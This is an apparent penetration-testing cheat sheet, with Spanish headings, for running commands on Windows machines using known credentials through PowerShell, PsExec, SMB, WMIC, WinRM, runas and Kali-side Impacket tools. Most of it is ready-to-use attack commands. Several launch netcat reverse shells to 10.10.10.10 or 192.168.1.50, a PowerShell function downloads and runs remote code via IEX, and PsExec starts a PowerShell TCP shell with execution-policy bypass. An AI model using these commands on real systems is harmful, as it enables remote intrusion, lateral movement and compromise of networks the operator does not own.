https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-1-wmi-and-winrm/


POWERSHELL
-------------------------------------
1. 
$pass = ConvertTo-SecureString "pass" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("username", $pass)
$computer = "hostname"
[System.Diagnostics.Process]::Start("c:\nc64.exe","10.10.10.10 4567 -e cmd",$mycreds.Username, $mycreds.Password, $computer)

2.
$pass = ConvertTo-SecureString "pass" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("username", $pass)
start-process -Credential $mycreds c:\users\"daniel lopez"\desktop\nc64.exe -argumentlist "10.10.10.10 4567 -e cmd"

3.
$pass = ConvertTo-SecureString "pass" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("username", $pass)
invoke-wmimethod win32_process -name create -Credential $mycreds -argumentlist 'C:\nc64.exe 10.10.10.10 4567 -e cmd'

4.
EMPIRE → spawnas

5.
runas-cabesha.ps1 // CyberVaca - adon90
-----------
function runas-cabesha-webdelivery {param ($url,$user,$pass)
$username = $user
$password = $pass
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credenciales = New-Object System.Management.Automation.PSCredential $username, $securePassword Start-Job -ArgumentList $url,$credenciales -ScriptBlock {param ($url,$credenciales)
$O=new-object net.webclient;$O.proxy=[Net.WebRequest]::GetSystemWebProxy();$O.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($O.downloadstring("$URL"))
} -Credential $credenciales | Wait-Job | Receive-Job
}

runas-cabesha-webdelivery -url <url_webdelivery> -user <url> -pass <pass>

6. https://github.com/mkellerman/Invoke-CommandAs
7. https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1

PsExec (PStools microsoft)
-----------------------------------
1.
./PsExec64.exe -accepteula -u user -p pass cmd /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass -File "C:\Tools\Invoke-PowerShellTcp.ps1"

2.
PsExec64.exe -accepteula -u attl4s -p pass cmd /k C:\users\attl4s\desktop\nc64.exe 192.168.1.50 4567


SMB
------------------------------------
net use \\127.0.0.1 /user:domain\user pass
    net use    
    dir \\127.0.0.1\c$
    dir \\127.0.0.1\ADMIN$
   
    
WMIC (No se pueden usar las credenciales de usuario para conexiones locales) (Interactive)
----------------------------------
wmic /node:hostname /user:domain\user path win32_process call create calc.exe


WINRM
---------------------------
$pass = ConvertTo-SecureString "pass" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("username", $pass)
$computer = "hostname"
Invoke-Command -Computer $computer -ScriptBlock {ipconfig /all} -credential $mycreds

$pass= ConvertTo-SecureString "pass" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("user", $pass)
$computer="hostname"
Enter-PSSession -ComputerName $computer -Credential $mycreds

    
RUNAS (Interactive)
-----------------------------------
runas /netonly /user:domain\user "cmd.exe"
    pass   
    

REMOTO DESDE KALI
-------------------------
psexec.py user:pass@10.10.10.10
smbexec.py user:pass@10.10.10.10
wmiexec.py user:pass@10.10.10.10
CrackMapExec.py 10.10.10.10 -d domain -u user -p pass -x cmd

smbclient -U "Administrator" \\\\10.10.10.10\\C$
smbclient \\\\10.10.10.10\\Users -U user pass

rdp_check.py domain\user:pass@10.10.10.10
rdesktop -d domain -u user -p pass 10.10.10.10





